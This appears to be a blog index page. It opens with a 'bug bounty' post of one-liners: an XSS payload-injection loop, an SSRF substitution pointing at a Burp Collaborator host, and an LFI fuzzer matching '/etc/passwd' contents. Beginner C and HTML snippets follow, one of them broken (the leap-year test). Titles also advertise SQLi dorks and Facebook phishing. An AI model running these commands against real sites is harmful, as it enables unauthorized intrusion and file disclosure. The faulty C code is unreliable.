Posts

Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

How to Find Leap Year in C Programming

 In this Article i am going to write a Program in C to find out that it is a Leap Year or Not. Please see the code and watch carefully. If you have any problem please comment below i will tell you about problem. First of all open your favourite editor for C coding. And write these code and then execute...... Note :: This is write in Ternary Operator  #include<stdio.h> int main(){ int yr; printf("Please enter a year "); scanf("%d", &yr); (yr%==0) ? printf("This is a Leap Year ") : printf("This is not a Leap Year "); return 0; }  

Find Cube of a Number in C

Find Cube of a Number in C   #include<stdio.h> int cub(int); int main()  {  int n = 3; printf("Cube of %d = %d \n", n, cub(n));    return 0;  }    int cub(int n)  {    return n * n * n;  } 

Amazing Login Form in HTML and CSS || Source Code

  Web-Development :  Today i am going to show you that how you can create a beautiful Login Form for your website in HTML and CSS. Here i written the code in HTML and CSS differently. You can combine both files of code and execute it. I recommended Sublim text editor for Web Development. So let start.... Please Carefully understand the code and if any issue then comment below. HTML   <html> <head> <title>Login Form</title> <link rel="stylesheet" type="text/css" href="css/util.css"> <link rel="stylesheet" type="text/css" href="css/main.css"> </head>  <body style="background-color: #999999;"> <div class="limiter"> <div class="container-login100"> <div class="login100-more" style="background-image: url('images/ds.jpg');"></div> <div class="wrap-login100 p-l-50 p-r-50 p-t-...

Find Factorial of a Number using Loop in C

 Hi guys, in this Article i will tell you about a program in C in which we can find the Factorial of a given number using While Loop. So start by Code ............. Read the following Code carefully and Understand it , in case of any problem please tell me. In this Article i have no any screen shot of the out put of the code please try your  self in any editor. Thank you........ #include<stdio.h> int main(){ int a,b=1; printf("Enter a value : "); scanf("%d",&a); int fac=1; while(b<=a){ fac=fac*b; b++; } printf("This is your factorial : %d ", fac);    return 0; }

How to input two variables from the user and display in C Programming

 In this Article i will tell you that  how to input two variables from the user and display their sum in C Language. Both variables are integers. So let start from Coding....... #include<stdio.h> int main() { int val1, val2, result; printf("Enter First Number : "); scanf("%d", &val1); printf("Enter Second Number : "); scanf("%d", &val2); result=val1+val2; printf("This is your Sum : %d ", result ); return 0; }

PUBG Intro

Image
 

PUBG || Gaming

Image
 

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to Hack Facebook Account New Method 2021 || Advanced Phishing Attack

Bug BOunty Helpful Commands